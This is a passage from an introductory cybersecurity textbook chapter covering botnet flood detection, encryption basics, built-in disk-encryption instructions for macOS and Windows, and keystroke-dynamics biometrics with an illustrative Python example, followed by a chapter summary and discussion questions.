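if __name__ == "__main__":
    dos, floods = detect_floods(constructed_log())
    print("single-source DoS from:", sorted(dos))
    print("aggregate flood windows (ts, syns, sources):", floods)
```

In the t=300 window no bot sends more than one SYN, so per-source rate limiting, the usual first line of defense, sees nothing, while the aggregate count on the target is exceeded by 300 distinct sources. Real detectors use much shorter windows and more signals (incomplete handshakes, bandwidth, geographic spread), but the blind spot of per-source limits against a botnet is the same.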
Infinity means that the number of possible keys should be so large that guessing the right one by trial and error would take on the order of 1.5 × 10^18 years (1.5 followed by 18 zeros). For practical purposes, that is infinity.70
The final component is that the text must be scrambled using a mathematical algorithm. The scrambled text is referred to as ciphertext. "Keys" are used to encrypt and decrypt the text. In public-key encryption, the text is encrypted with a public key. This key is known to everyone and is distributed publicly. Because the public key can only encrypt (scramble) the text but not decrypt it, it does not need to be kept secret. A private key, however, must be kept private because it decrypts the text, that is, makes it readable. The private key should be known only to the person receiving the message.71 (Symmetric ciphers such as AES instead use one shared secret key for both operations; public-key systems are commonly used to exchange such a key securely.) If other people obtained the private key, they could read text that was meant to stay private. For instance, messages sent by military leaders to their troops need to be kept secret or the safety of the troops could be in danger. If the enemy knew how the Navy SEALs were going to free a hostage, the SEALs could be killed during their mission.
Figures 3.1 and 3.2 illustrate how encryption and decryption work.
Figure 3.1 Encryption
The process of decryption is basically the reverse:
Figure 3.2 Decryption
What Can You Do?: Encrypting Your Computer
- macOS
If you own a Macintosh computer, you can encrypt your startup disk with FileVault, which is built in:
– Open System Preferences
– Click Security & Privacy
– Click FileVault
– Turn On FileVault
– You will be shown a recovery key (DO NOT LOSE IT); it is the only way to unlock the disk if you forget your login password, so store it somewhere off the computer
– You can confirm that encryption is active by running fdesetup status in Terminal
- PC
If you own a PC running Windows 10 Pro, Enterprise, or Education, you can use BitLocker, which is already built in:
– Control Panel
– System and Security
– BitLocker Drive Encryption
– Save the recovery key to your Microsoft account, a USB drive, or a printout kept off the computer
– You can confirm the status by running manage-bde -status from an administrator command prompt
If you own a PC without one of those editions, you can use the free, open-source software VeraCrypt (which also runs on macOS and Linux):
– Download VeraCrypt
– Follow the instructions on the screen
Whole-disk encryption protects data only while the computer is powered off or locked; a running, unlocked machine exposes its files to any malware on it, so encryption complements rather than replaces the measures above.
Future Developments
One of the most promising technologies in cybersecurity is biometrics, which is "the measurement and statistical analysis of people's physical and behavioral characteristics."72 Biometrics comes in two forms: physical characteristics such as fingerprints, faces, and irises, and behavioral characteristics such as how a person types, moves a mouse, or handles a touchscreen. It is mainly used for identification and for controlling access to computers and mobile devices. Every person has unique characteristics and behaviors. Fingerprints have long been used by police to identify suspects in a crime and by companies to control who has access to certain areas, so they can also be used to control access to computers and mobile devices; several companies, such as Apple with Touch ID, already offer that option. Another biometric option is behavioral data. Every person has a different way of typing, and software can measure how long each key is held down and the delay between keystrokes to judge whether the person typing is the device's actual owner. Mouse use is likewise distinct between people. Touchscreens are also being employed for user identification: researchers have found that people touch different parts of a touchscreen, and a system called SilentSense combines touch behavior (pressure, area, duration, position) with the device's reaction (rotation and acceleration).73 This type of technology is still developing, however, and hackers will likely find ways to disable or fool such systems. Biometrics also differ from passwords in one important way: a fingerprint or face cannot be changed if a copy of it is stolen, so a biometric is best treated as a convenient identifier backed up by a PIN or password rather than as a secret in its own right.
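The typing-behavior check described above can be shown in a few lines of code. The following is an added illustration, not from the textbook and not the code of SilentSense or any other product named in it: an enrollment profile is built from how long each key is held down and the delay between consecutive key presses, and a new typing sample is accepted when its timings stay close to that profile. All key timings are constructed for the example, not recorded from a real user, and the acceptance threshold and the 5 ms jitter floor are assumptions.

```python
"""Added example (not from the textbook): keystroke dynamics, the behavioral
biometric the text describes.  All timings below are constructed, not recorded."""
from statistics import mean, pstdev

# One typing sample of the phrase "pass": (key, press_ms, release_ms) per key.
# Constructed enrollment samples for the device's owner.
OWNER_ENROLLMENT = [
    [("p", 0, 90), ("a", 150, 230), ("s", 300, 380), ("s", 440, 520)],
    [("p", 0, 95), ("a", 160, 240), ("s", 310, 395), ("s", 450, 530)],
    [("p", 0, 85), ("a", 140, 220), ("s", 290, 370), ("s", 430, 515)],
    [("p", 0, 90), ("a", 150, 235), ("s", 305, 385), ("s", 445, 525)],
]
# The owner typing the phrase again, and an impostor who knows the phrase
# but types it more slowly and holds the keys longer (both constructed).
OWNER_PROBE = [("p", 0, 92), ("a", 152, 232), ("s", 302, 384), ("s", 442, 522)]
IMPOSTOR_PROBE = [("p", 0, 130), ("a", 260, 370), ("s", 500, 610), ("s", 750, 860)]

MIN_STD_MS = 5.0   # assumed floor: even a consistent typist jitters by a few ms
THRESHOLD = 2.0    # assumed: a mean z-score above this is rejected


def features(sample):
    """Hold time of each key, then press-to-press latency between neighbours."""
    holds = [release - press for _, press, release in sample]
    latencies = [sample[i + 1][1] - sample[i][1] for i in range(len(sample) - 1)]
    return holds + latencies


def enroll(samples):
    """Per-feature mean and (floored) standard deviation over several samples."""
    vectors = [features(s) for s in samples]
    if len({len(v) for v in vectors}) != 1:
        raise ValueError("all enrollment samples must be of the same phrase")
    columns = list(zip(*vectors))
    return {
        "mean": [mean(c) for c in columns],
        "std": [max(pstdev(c), MIN_STD_MS) for c in columns],
    }


def score(profile, sample):
    """Mean absolute z-score of the sample against the profile (lower = closer)."""
    vector = features(sample)
    if len(vector) != len(profile["mean"]):
        raise ValueError("sample is not the enrolled phrase")
    z = [abs(x - m) / s for x, m, s in zip(vector, profile["mean"], profile["std"])]
    return mean(z)


def verify(profile, sample, threshold=THRESHOLD):
    """True if the typing rhythm is close enough to the enrolled owner's."""
    return score(profile, sample) < threshold


if __name__ == "__main__":
    profile = enroll(OWNER_ENROLLMENT)
    for name, probe in (("owner", OWNER_PROBE), ("impostor", IMPOSTOR_PROBE)):
        print(f"{name}: score={score(profile, probe):.2f} accepted={verify(profile, probe)}")
```

The impostor here is rejected purely on rhythm even though the phrase itself was typed correctly, which is the point of a behavioral biometric; in practice the threshold is tuned on real users to balance locking out the owner on a bad day against admitting an impostor, and the check is used alongside a password rather than instead of one.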
Summary
Chapter 3 explains the difference between viruses, worms, and Trojan horses and details the purposes for which they are used. The chapter also provides insight into advanced persistent threats and denial-of-service attacks, such as the one carried out by the Mirai botnet. Finally, Chapter 3 gives an overview of basic cybersecurity measures that everyone can use to protect their computer and data. The use of malware has evolved into a multibillion-dollar business, and every Fortune 500 company is well aware that it is a constant target of hacker attacks and will likely suffer a data breach. Cybersecurity specialists state that 100% protection is impossible and that much depends on preparedness for a major attack. This is also true for critical infrastructure, which is largely owned by private companies. A successful attack on the power grid of Los Angeles, for example, could do great damage to the city: without power there are no alarms, automatic doors may stay open, and people could use the chaos of darkness to loot, burglarize houses, and commit a variety of other crimes. The Mirai botnet made headlines among the general public and cybersecurity professionals not only because it made much of the Internet unreachable for users in North America, but because it was built from IoT devices (Internet-connected video cameras, digital video recorders, and home routers) rather than from personal computers. As the number of IoT devices grows, so does the threat to private companies and critical infrastructure. Cybersecurity measures are available, but technology always depends on human decision-making, the human factor. Part of the security challenge is to educate people about cybersecurity. The other challenge is to convince companies to build their IoT devices with good cybersecurity measures in place, but profit often trumps security in a field where time is money.
Key Terms
- Advanced Persistent Threat
- Antivirus Software
- Biometrics
- Firewall
- Malware
- Ransomware
- Social Engineering
- Spyware
- Trojan Horse
- Virus
- Worm
Discussion Questions
- Discuss similarities and differences between worms, viruses, and Trojan horses.
- Discuss the countermeasures to cyberthreats and how effective they are. What countermeasures would you suggest?
- Discuss the protections that antivirus software provides and the criteria on which you would choose your antivirus program.
- Read the reference article on “How to protect your computer networks from ransomware” (https://www.justice.gov/criminal-ccips/file/872771/download). Which of the measures described in the article are you using? Will you change your behavior based on what you have learned?
- Discuss what mobile devices you own and what the threats to your devices are. How can you protect your devices from cyber intrusions?
- Look at the ratings of different antivirus software programs and discuss the categories used to rank the programs. From what you have learned in the chapter, which categories are most important?